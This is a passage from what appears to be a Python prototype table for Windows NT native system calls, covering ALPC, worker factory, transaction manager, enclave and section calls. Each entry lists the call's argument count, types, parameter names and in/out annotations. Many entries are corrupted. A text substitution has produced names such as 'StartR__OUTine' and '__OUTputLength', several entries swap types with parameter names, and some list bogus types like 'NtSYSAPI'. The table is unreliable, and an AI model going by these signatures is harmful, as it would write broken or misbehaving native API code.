'ULONG', 'ContextHandle'], 'NTSTATUS', ['__IN', None, '__IN']), 'NtAlpcSendWaitReceivePort': (8, ['HANDLE', 'ULONG', 'PPORT_MESSAGE', 'PALPC_MESSAGE_ATTRIBUTES', 'PPORT_MESSAGE', 'PULONG', 'PALPC_MESSAGE_ATTRIBUTES', 'PLARGE_INTEGER'], ['PortHandle', 'Flags', 'SendMessage', 'SendMessageAttributes', 'ReceiveMessage', 'BufferLength', 'ReceiveMessageAttributes', 'Time_Out'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_OUT_opt', '__IN_OUT_opt', '__IN_OUT_opt', '__IN_OUT_opt', '__IN_opt']), 'NtAlpcSetInformation': (4, ['HANDLE', 'ALPC_PORT__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['PortHandle', 'PortInformationClass', 'PortInformation', 'Length'], 'NTSTATUS', ['__IN', '__IN', '__IN_bcount', '__IN']), 'NtEnumerateBootEntries': (2, ['PVOID', 'PULONG'], ['Buffer', 'BufferLength'], 'NTSTATUS', [None, '__IN_OUT']), 'NtEnumerateDriverEntries': (2, ['PVOID', 'PULONG'], ['Buffer', 'BufferLength'], 'NTSTATUS', [None, '__IN_OUT']), 'NtEnumerateSystemEnvironmentValuesEx': (3, ['ULONG', 'PVOID', 'PULONG'], ['InformationClass', 'Buffer', 'BufferLength'], 'NTSTATUS', ['__IN', '__OUT', '__IN_OUT']), 'NtQueryBootEntryOrder': (2, ['PULONG', 'PULONG'], ['Ids', 'Count'], 'NTSTATUS', [None, '__IN_OUT']), 'NtQueryBootOptions': (2, ['PBOOT_OPTIONS', 'PULONG'], ['BootOptions', 'BootOptionsLength'], 'NTSTATUS', [None, '__IN_OUT']), 'NtQueryDriverEntryOrder': (2, ['PULONG', 'PULONG'], ['Ids', 'Count'], 'NTSTATUS', [None, '__IN_OUT']), 'NtQuerySystemEnvironmentValueEx': (5, ['PUNICODE_STRING', 'LPGUID', 'PVOID', 'PULONG', '__opt'], ['VariableName', 'VendorGuid', 'Value', 'ValueLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN_OUT', None]), 'NtSetBootEntryOrder': (2, ['PULONG', 'ULONG'], ['Ids', 'Count'], 'NTSTATUS', [None, '__IN']), 'NtSetDriverEntryOrder': (2, ['PULONG', 'ULONG'], ['Ids', 'Count'], 'NTSTATUS', [None, '__IN']), 'NtQuerySystemInformationEx': (6, ['SYSTEM__INFORMATION_CLASS', 'PVOID', 'ULONG', 'PVOID', 'ULONG', '__opt'], ['SystemInformationClass', 'QueryInformation', 'QueryInformationLength', 'SystemInformation', 'SystemInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', None, '__IN', None, '__IN', None]), 'NtInitializeNlsFiles': (3, ['PVOID', 'PLCID', 'PLARGE_INTEGER'], ['*BaseAddress', 'DefaultLocaleId', 'DefaultCasingTableSize'], 'NTSTATUS', ['__OUT', '__OUT', '__OUT']), 'NtAcquireCMFViewOwnership': (3, ['PULONGLONG', 'PBOOLEAN', 'BOOLEAN'], ['TimeStamp', 'tokenTaken', 'replaceExisting'], 'NTSTATUS', ['__OUT', '__OUT', '__IN']), 'NtCreateProfileEx': (10, ['PHANDLE', 'HANDLE', 'PVOID', 'SIZE_T', 'ULONG', 'PULONG', 'ULONG', 'KPROFILE_SOURCE', 'ULONG', 'PGROUP_AFFINITY'], ['ProfileHandle', 'Process', 'ProfileBase', 'ProfileSize', 'BucketSize', 'Buffer', 'BufferSize', 'ProfileSource', 'GroupAffinityCount', 'GroupAffinity'], 'NTSTATUS', ['__OUT', '__IN_opt', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN_opt']), 'NtCreateWorkerFactory': (10, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE', 'HANDLE', 'PVOID', 'PVOID', 'ULONG', 'SIZE_T', 'SIZE_T'], ['WorkerFactoryHandleReturn', 'DesiredAccess', 'ObjectAttributes', 'CompletionPortHandle', 'WorkerProcessHandle', 'StartR__OUTine', 'StartParameter', 'MaxThreadCount', 'StackReserve', 'StackCommit'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtFlushInstallUILanguage': (2, ['LANGID', 'ULONG'], ['InstallUILanguage', 'SetComittedFlag'], 'NTSTATUS', ['__IN', '__IN']), 'NtGetMUIRegistryInfo': (3, ['ULONG', 'PULONG', 'PVOID'], ['Flags', 'DataSize', 'Data'], 'NTSTATUS', ['__IN', '__IN_OUT', '__OUT']), 'NtGetNlsSectionPtr': (5, ['ULONG', 'ULONG', 'PVOID', 'PVOID', 'PULONG'], ['SectionType', 'SectionData', 'ContextData', '*SectionPointer', 'SectionSize'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__OUT']), 'NtIsUILanguageComitted': (0, [], [], 'NTSTATUS', []), 'NtReleaseCMFViewOwnership': (0, [], [], 'NTSTATUS', []), 'NtReleaseWorkerFactoryWorker': (1, ['HANDLE'], ['WorkerFactoryHandle'], 'NTSTATUS', ['__IN']), 'NtQueryInformationWorkerFactory': (5, ['HANDLE', 'WORKERFACTORYINFOCLASS', 'PVOID', 'ULONG', '__opt'], ['WorkerFactoryHandle', 'WorkerFactoryInformationClass', 'WorkerFactoryInformation', 'WorkerFactoryInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtSetInformationWorkerFactory': (4, ['HANDLE', 'WORKERFACTORYINFOCLASS', 'PVOID', 'ULONG'], ['WorkerFactoryHandle', 'WorkerFactoryInformationClass', 'WorkerFactoryInformation', 'WorkerFactoryInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtWaitForWorkViaWorkerFactory': (2, ['HANDLE', 'FILE_IO_COMPLETION__INFORMATION'], ['WorkerFactoryHandle', '*MiniPacket'], 'NTSTATUS', ['__IN', '__OUT']), 'NtShutdownWorkerFactory': (2, ['HANDLE', 'LONG'], ['WorkerFactoryHandle', '*PendingWorkerCount'], 'NTSTATUS', ['__IN', '__IN_OUT']), 'NtSetTimerEx': (4, ['HANDLE', 'TIMER_SET__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TimerHandle', 'TimerSetInformationClass', 'TimerSetInformation', 'TimerSetInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtCancelTimer2': (2, ['HANDLE', '__opt'], ['TimerHandle', 'PBOOLEAN'], 'NTSTATUS', ['__IN', None]), 'NtSetTimer2': (4, ['HANDLE', 'PLARGE_INTEGER', 'PLARGE_INTEGER', 'PT2_SET_PARAMETERS'], ['TimerHandle', 'DueTime', 'Period', 'Parameters'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN']), 'NtQueryWnfStateData': (6, ['PCWNF_STATE_NAME', 'PCWNF_TYPE_ID', 'PVOID', 'PWNF_CHANGE_STAMP', 'PVOID', 'PULONG'], ['StateName', 'TypeId', 'ExplicitScope', 'ChangeStamp', 'Buffer', 'BufferSize'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_opt_', None, None, '__IN_OUT_']), 'NtUpdateWnfStateData': (7, ['PCWNF_STATE_NAME', 'PVOID', 'ULONG', 'PCWNF_TYPE_ID', 'PVOID', 'WNF_CHANGE_STAMP', 'LOGICAL'], ['StateName', 'Buffer', 'Length', 'TypeId', 'ExplicitScope', 'MatchingChangeStamp', 'CheckStamp'], 'NTSTATUS', ['__IN_', None, '__IN_opt_', '__IN_opt_', '__IN_opt_', '__IN_', '__IN_']), 'NtDisableLastKnownGood': (0, [], [], 'NTSTATUS', []), 'NtEnableLastKnownGood': (0, [], [], 'NTSTATUS', []), 'NtCancelSynchronousIoFile': (3, ['HANDLE', 'PIO_STATUS_BLOCK', 'PIO_STATUS_BLOCK'], ['ThreadHandle', 'IoRequestToCancel', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__IN_opt', '__OUT']), 'NtSetIoCompletion': (5, ['HANDLE', 'ULONG', 'PVOID', 'NTSTATUS', 'ULONG_PTR'], ['IoCompletionHandle', 'CompletionKey', 'CompletionValue', 'IoStatus', 'IoStatusInformation'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__IN']), 'NtSetIoCompletionEx': (6, ['HANDLE', 'HANDLE', 'ULONG', 'PVOID', 'NTSTATUS', 'ULONG_PTR'], ['IoCompletionHandle', 'IoCompletionReserveHandle', 'CompletionKey', 'CompletionValue', 'IoStatus', 'IoStatusInformation'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN']), 'NtRemoveIoCompletionEx': (6, ['HANDLE', 'FILE_IO_COMPLETION__INFORMATION', 'ULONG', 'PVOID', 'PLARGE_INTEGER', 'BOOLEAN'], ['IoCompletionHandle', 'IoCompletionInformation', 'Count', 'NumEntriesRemoved', 'Time_Out', 'Alertable'], 'NTSTATUS', ['__IN', None, '__IN', '__OUT', '__IN_opt', '__IN']), 'NtNotifyChangeSession': (8, ['HANDLE', 'ULONG', 'PVOID', 'ULONG', 'IO_SESSION_STATE', 'IO_SESSION_STATE', 'PVOID', 'ULONG'], ['SessionHandle', 'IoStateSequence', 'Reserved', 'Action', 'IoState', 'IoState2', 'Buffer', 'BufferSize'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtAssociateWaitCompletionPacket': (8, ['HANDLE', 'HANDLE', 'HANDLE', 'PVOID', 'PVOID', 'NTSTATUS', 'ULONG_PTR', 'opt_'], ['WaitCompletionPacketHandle', 'IoCompletionHandle', 'TargetObjectHandle', 'KeyContext', 'ApcContext', 'IoStatus', 'IoStatusInformation', 'PBOOLEAN'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', '__IN_opt_', '__IN_opt_', '__IN', '__IN_', None]), 'NtFlushProcessWriteBuffers': (0, [], [], 'NTSTATUS', []), 'NtCommitComplete': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtCommitEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtCommitTransaction': (2, ['HANDLE', 'BOOLEAN'], ['TransactionHandle', 'Wait'], 'NTSTATUS', ['__IN', '__IN']), 'NtCreateEnlistment': (8, ['PHANDLE', 'ACCESS_MASK', 'HANDLE', 'HANDLE', 'POBJECT_ATTRIBUTES', 'ULONG', 'NOTIFICATION_MASK', 'PVOID'], ['EnlistmentHandle', 'DesiredAccess', 'ResourceManagerHandle', 'TransactionHandle', 'ObjectAttributes', 'CreateOptions', 'NotificationMask', 'EnlistmentKey'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN', '__IN_opt']), 'NtCreateResourceManager': (7, ['PHANDLE', 'ACCESS_MASK', 'HANDLE', 'LPGUID', 'POBJECT_ATTRIBUTES', 'ULONG', 'PUNICODE_STRING'], ['ResourceManagerHandle', 'DesiredAccess', 'TmHandle', 'RmGuid', 'ObjectAttributes', 'CreateOptions', 'Description'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtCreateTransaction': (10, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'LPGUID', 'HANDLE', 'ULONG', 'ULONG', 'ULONG', 'PLARGE_INTEGER', 'PUNICODE_STRING'], ['TransactionHandle', 'DesiredAccess', 'ObjectAttributes', 'Uow', 'TmHandle', 'CreateOptions', 'IsolationLevel', 'IsolationFlags', 'Time_Out', 'Description'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtCreateTransactionManager': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PUNICODE_STRING', 'ULONG', 'ULONG'], ['TmHandle', 'DesiredAccess', 'ObjectAttributes', 'LogFileName', 'CreateOptions', 'CommitStrength'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtEnumerateTransactionObject': (5, ['HANDLE', 'KTMOBJECT_TYPE', 'PKTMOBJECT_CURSOR', 'ULONG', 'PULONG'], ['RootObjectHandle', 'QueryType', 'ObjectCursor', 'ObjectCursorLength', 'ReturnLength'], 'NTSTATUS', ['__IN_opt', '__IN', None, '__IN', '__OUT']), 'NtFreezeTransactions': (2, ['PLARGE_INTEGER', 'PLARGE_INTEGER'], ['FreezeTime_Out', 'ThawTime_Out'], 'NTSTATUS', ['__IN', '__IN']), 'NtGetNotificationResourceManager': (7, ['HANDLE', 'PTRANSACTION_NOTIFICATION', 'ULONG', 'PLARGE_INTEGER', '__opt', 'ULONG', 'ULONG_PTR'], ['ResourceManagerHandle', 'TransactionNotification', 'NotificationLength', 'Time_Out', 'PULONG', 'Asynchronous', 'AsynchronousContext'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN_opt', None, '__IN', '__IN_opt']), 'NtOpenEnlistment': (5, ['PHANDLE', 'ACCESS_MASK', 'HANDLE', 'LPGUID', 'POBJECT_ATTRIBUTES'], ['EnlistmentHandle', 'DesiredAccess', 'ResourceManagerHandle', 'EnlistmentGuid', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtOpenResourceManager': (5, ['PHANDLE', 'ACCESS_MASK', 'HANDLE', 'LPGUID', 'POBJECT_ATTRIBUTES'], ['ResourceManagerHandle', 'DesiredAccess', 'TmHandle', 'ResourceManagerGuid', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN_opt', '__IN_opt']), 'NtOpenTransaction': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'LPGUID', 'HANDLE'], ['TransactionHandle', 'DesiredAccess', 'ObjectAttributes', 'Uow', 'TmHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN_opt']), 'NtOpenTransactionManager': (6, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PUNICODE_STRING', 'LPGUID', 'ULONG'], ['TmHandle', 'DesiredAccess', 'ObjectAttributes', 'LogFileName', 'TmIdentity', 'OpenOptions'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtPrepareComplete': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtPrepareEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtPrePrepareComplete': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtPrePrepareEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtPropagationComplete': (4, ['HANDLE', 'ULONG', 'ULONG', 'PVOID'], ['ResourceManagerHandle', 'RequestCookie', 'BufferLength', 'Buffer'], 'NTSTATUS', ['__IN', '__IN', '__IN', None]), 'NtPropagationFailed': (3, ['HANDLE', 'ULONG', 'NTSTATUS'], ['ResourceManagerHandle', 'RequestCookie', 'PropStatus'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtQueryInformationEnlistment': (5, ['HANDLE', 'ENLISTMENT__INFORMATION_CLASS', 'PVOID', 'ULONG', '__opt'], ['EnlistmentHandle', 'EnlistmentInformationClass', 'EnlistmentInformation', 'EnlistmentInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtQueryInformationResourceManager': (5, ['HANDLE', 'RESOURCEMANAGER__INFORMATION_CLASS', 'PVOID', 'ULONG', '__opt'], ['ResourceManagerHandle', 'ResourceManagerInformationClass', 'ResourceManagerInformation', 'ResourceManagerInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtQueryInformationTransaction': (5, ['HANDLE', 'TRANSACTION__INFORMATION_CLASS', 'PVOID', 'ULONG', '__opt'], ['TransactionHandle', 'TransactionInformationClass', 'TransactionInformation', 'TransactionInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtQueryInformationTransactionManager': (5, ['HANDLE', 'TRANSACTIONMANAGER__INFORMATION_CLASS', 'PVOID', 'ULONG', '__opt'], ['TransactionManagerHandle', 'TransactionManagerInformationClass', 'TransactionManagerInformation', 'TransactionManagerInformationLength', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', None, '__IN', None]), 'NtReadOnlyEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtRecoverEnlistment': (2, ['HANDLE', 'PVOID'], ['EnlistmentHandle', 'EnlistmentKey'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtRecoverResourceManager': (1, ['HANDLE'], ['ResourceManagerHandle'], 'NTSTATUS', ['__IN']), 'NtRecoverTransactionManager': (1, ['HANDLE'], ['TransactionManagerHandle'], 'NTSTATUS', ['__IN']), 'NtRegisterProtocolAddressInformation': (5, ['HANDLE', 'PCRM_PROTOCOL_ID', 'ULONG', 'PVOID', 'ULONG'], ['ResourceManager', 'ProtocolId', 'ProtocolInformationSize', 'ProtocolInformation', 'CreateOptions'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN_opt']), 'NtRenameTransactionManager': (2, ['PUNICODE_STRING', 'LPGUID'], ['LogFileName', 'ExistingTransactionManagerGuid'], 'NTSTATUS', ['__IN', '__IN']), 'NtRollBackComplete': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtRollBackEnlistment': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtRollBackTransaction': (2, ['HANDLE', 'BOOLEAN'], ['TransactionHandle', 'Wait'], 'NTSTATUS', ['__IN', '__IN']), 'NtRollforwardTransactionManager': (2, ['HANDLE', 'PLARGE_INTEGER'], ['TmHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtSetInformationEnlistment': (4, ['HANDLE', 'ENLISTMENT__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['EnlistmentHandle', 'EnlistmentInformationClass', 'EnlistmentInformation', 'EnlistmentInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtSetInformationResourceManager': (4, ['HANDLE', 'RESOURCEMANAGER__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['ResourceManagerHandle', 'ResourceManagerInformationClass', 'ResourceManagerInformation', 'ResourceManagerInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtSetInformationTransaction': (4, ['HANDLE', 'TRANSACTION__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TransactionHandle', 'TransactionInformationClass', 'TransactionInformation', 'TransactionInformationLength'], 'NTSTATUS', ['__IN', '__IN', None, '__IN']), 'NtSetInformationTransactionManager': (4, ['HANDLE', 'TRANSACTIONMANAGER__INFORMATION_CLASS', 'PVOID', 'ULONG'], ['TmHandle', 'TransactionManagerInformationClass', 'TransactionManagerInformation', 'TransactionManagerInformationLength'], 'NTSTATUS', ['__IN_opt', '__IN', None, '__IN']), 'NtSinglePhaseReject': (2, ['HANDLE', 'PLARGE_INTEGER'], ['EnlistmentHandle', 'TmVirtualClock'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtStartTm': (0, [], [], 'NTSTATUS', []), 'NtThawRegistry': (0, [], [], 'NTSTATUS', []), 'NtThawTransactions': (0, [], [], 'NTSTATUS', []), 'NtDrawText': (1, ['PUNICODE_STRING'], ['Text'], 'NTSTATUS', ['__IN']), 'NtTraceControl': (6, ['ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['FunctionCode', 'InBuffer', 'InBufferLen', '__OUTBuffer', '__OUTBufferLen', 'ReturnLength'], 'NTSTATUS', ['__IN', None, '__IN', None, '__IN', '__OUT']), 'NtSetWnfProcessNotificationEvent': (1, ['HANDLE'], ['Unknown1'], 'NTSTATUS', ['__IN']), 'NtSetInformationVirtualMemory': (6, ['HANDLE', 'VIRTUAL_MEMORY__INFORMATION_CLASS', 'ULONG_PTR', 'PMEMORY_RANGE_ENTRY', 'PVOID', 'ULONG'], ['ProcessHandle', 'VmInformationClass', 'NumberOfEntries', 'VirtualAddresses', 'VmInformation', 'VmInformationLength'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', None, None, '__IN_']), 'NtOpenPrivateNamespace': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PVOID'], ['NamespaceHandle', 'DesiredAccess', 'ObjectAttributes', 'BoundaryDescriptor'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtCreatePrivateNamespace': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PVOID'], ['NamespaceHandle', 'DesiredAccess', 'ObjectAttributes', 'BoundaryDescriptor'], 'NTSTATUS', ['__OUT', '__IN', '__IN_opt', '__IN']), 'NtDeletePrivateNamespace': (1, ['HANDLE'], ['NamespaceHandle'], 'NTSTATUS', ['__IN']), 'NtReplacePartitionUnit': (3, ['PUNICODE_STRING', 'PUNICODE_STRING', 'ULONG'], ['TargetInstancePath', 'SpareInstancePath', 'Flags'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSerializeBoot': (0, [], [], 'NTSTATUS', []), 'NtOpenKeyTransacted': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'HANDLE'], ['KeyHandle', 'DesiredAccess', 'ObjectAttributes', 'TransactionHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtOpenKeyTransactedEx': (5, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG', 'HANDLE'], ['KeyHandle', 'DesiredAccess', 'ObjectAttributes', 'OpenOptions', 'TransactionHandle'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN', '__IN']), 'NtFreezeRegistry': (1, ['ULONG'], ['Time_OutInSeconds'], 'NTSTATUS', ['__IN']), 'NtCreateKeyTransacted': (8, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', '__reserved', 'PUNICODE_STRING', 'ULONG', 'HANDLE', '__opt'], ['KeyHandle', 'DesiredAccess', 'ObjectAttributes', 'ULONG', 'Class', 'CreateOptions', 'TransactionHandle', 'PULONG'], 'NTSTATUS', ['__OUT', '__IN', '__IN', None, '__IN_opt', '__IN', '__IN', None]), 'NtQuerySecurityAttributesToken': (6, ['HANDLE', 'PUNICODE_STRING', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['TokenHandle', 'Attributes', 'NumberOfAttributes', 'Buffer', 'Length', 'ReturnLength'], 'NTSTATUS', ['__IN', None, '__IN', None, '__IN', '__OUT']), 'NtWow64CallFunction64': (7, ['ULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG', 'PVOID', '__opt'], ['FunctionIndex', 'Flags', 'InputLength', 'InputBuffer', '__OUTputLength', '__OUTputBuffer', 'PULONG'], 'NTSTATUS', ['__IN', '__IN', '__IN', None, '__IN', None, None]), 'NtWow64WriteVirtualMemory64': (5, ['HANDLE', 'PVOID64', 'PVOID', 'ULONGLONG', '__opt'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'BufferSize', 'PULONGLONG'], 'NTSTATUS', ['__IN', '__IN_opt', None, '__IN', None]), 'NtAlpcConnectPortEx': (11, ['PHANDLE', 'POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'PALPC_PORT_ATTRIBUTES', 'ULONG', 'PSECURITY_DESCRIPTOR', 'PPORT_MESSAGE', 'PSIZE_T', 'PALPC_MESSAGE_ATTRIBUTES', 'PALPC_MESSAGE_ATTRIBUTES', 'PLARGE_INTEGER'], ['PortHandle', 'ConnectionPortObjectAttributes', 'ClientPortObjectAttributes', 'PortAttributes', 'Flags', 'ServerSecurityRequirements', 'ConnectionMessage', 'BufferLength', '__OUTMessageAttributes', 'InMessageAttributes', 'Time_Out'], 'NTSTATUS', [None, '__IN_', '__IN_opt_', '__IN_opt_', '__IN_', '__IN_opt_', None, '__IN_OUT_opt_', '__IN_OUT_opt_', '__IN_OUT_opt_', '__IN_opt_']), 'NtAlpcImpersonateClientContainerOfPort': (3, ['HANDLE', 'PPORT_MESSAGE', 'ULONG'], ['PortHandle', 'Message', 'Flags'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_']), 'NtAreMappedFilesTheSame': (2, ['PVOID', 'PVOID'], ['File1MappedAsAnImage', 'File2MappedAsFile'], 'NTSTATUS', ['__IN', '__IN']), 'NtAssignProcessToJobObject': (2, ['HANDLE', 'HANDLE'], ['JobHandle', 'ProcessHandle'], 'NTSTATUS', [None, None]), 'NtCreateJobSet': (3, ['IN', 'IN', 'IN'], ['ULONG', 'PJOB_SET_ARRAY', 'ULONG'], 'NTSTATUS', [None, None, None]), 'NtCreateJobObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['JobHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', [None, None, None]), 'NtOpenJobObject': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['JobHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', [None, None, None]), 'NtQueryInformationJobObject': (5, ['HANDLE', 'JOBOBJECTINFOCLASS', 'PVOID', 'ULONG', 'PULONG'], ['JobHandle', 'JobInformationClass', 'JobInformation', 'JobInformationLength', 'ReturnLength'], 'NTSTATUS', [None, None, None, None, None]), 'NtSetInformationJobObject': (4, ['HANDLE', 'JOBOBJECTINFOCLASS', 'PVOID', 'ULONG'], ['JobHandle', 'JobInformationClass', 'JobInformation', 'JobInformationLength'], 'NTSTATUS', [None, None, None, None]), 'NtTerminateJobObject': (2, ['HANDLE', 'NtSYSAPI'], ['JobHandle', 'NTSTATUS'], 'NTSTATUS', [None, None]), 'NtCallEnclave': (4, ['PENCLAVE_R__OUTINE', 'PVOID', 'BOOLEAN', 'opt_'], ['R__OUTine', 'Parameter', 'WaitForThread', 'PVOID'], 'NTSTATUS', ['__IN_', '__IN_', '__IN_', None]), 'NtTerminateEnclave': (2, ['PVOID', 'BOOLEAN'], ['BaseAddress', 'WaitForThread'], 'NTSTATUS', ['__IN_', '__IN_']), 'NtInitializeEnclave': (5, ['HANDLE', 'PVOID', 'PVOID', 'ULONG', 'opt_'], ['ProcessHandle', 'BaseAddress', 'EnclaveInformation', 'EnclaveInformationLength', 'PULONG'], 'NTSTATUS', ['__IN_', '__IN_', None, '__IN_', None]), 'NtCreateEnclave': (9, ['HANDLE', 'PVOID*', 'ULONG_PTR', 'SIZE_T', 'SIZE_T', 'ULONG', 'PVOID', 'ULONG', 'opt_'], ['ProcessHandle', 'BaseAddress', 'ZeroBits', 'Size', 'InitialCommitment', 'EnclaveType', 'EnclaveInformation', 'EnclaveInformationLength', 'PULONG'], 'NTSTATUS', ['__IN_', '__IN_OUT_', '__IN_', '__IN_', '__IN_', '__IN_', None, '__IN_', None]), 'NtLoadEnclaveData': (9, ['HANDLE', 'PVOID', 'PVOID', 'SIZE_T', 'ULONG', 'PVOID', 'ULONG', 'opt_', 'opt_'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'BufferSize', 'Protect', 'PageInformation', 'PageInformationLength', 'PSIZE_T', 'PULONG'], 'NTSTATUS', ['__IN_', '__IN_', None, '__IN_', '__IN_', None, '__IN_', None, None]), 'NtCreateSectionEx': (9, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'PLARGE_INTEGER', 'ULONG', 'ULONG', 'HANDLE', 'PMEM_EXTENDED_PARAMETER', 'ULONG'], ['SectionHandle', 'DesiredAccess', 'ObjectAttributes', 'MaximumSize', 'SectionPageProtection', 'AllocationAttributes', 'FileHandle', 'ExtendedParameters', 'ExtendedParameterCount'], 'NTSTATUS', [None, '__IN_', '__IN_opt_', '__IN_opt_', '__IN_', '__IN_', '__IN_opt_', None, '__IN_']), 'NtMapViewOfSectionEx': (9, ['HANDLE', 'HANDLE', 'PVOID', 'PLARGE_INTEGER', 'PSIZE_T', 'ULONG', 'ULONG', 'PMEM_EXTENDED_PARAMETER', 'ULONG'], ['SectionHandle', 'ProcessHandle', '*BaseAddress', 'SectionOffset', 'ViewSize', 'AllocationType', 'Win32Protect', 'ExtendedParameters', 'ExtendedParameterCount'], 'NTSTATUS', ['__IN_', '__IN_', None, '__IN_OUT_opt_', '__IN_OUT_', '__IN_', '__IN_', None, '__IN_']), 'NtUnmapViewOfSectionEx': (3, ['HANDLE', 'PVOID', 'ULONG'], ['ProcessHandle', 'BaseAddress', 'Flags'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_']), 'NtCreatePartition': (5, ['HANDLE', 'PHANDLE', 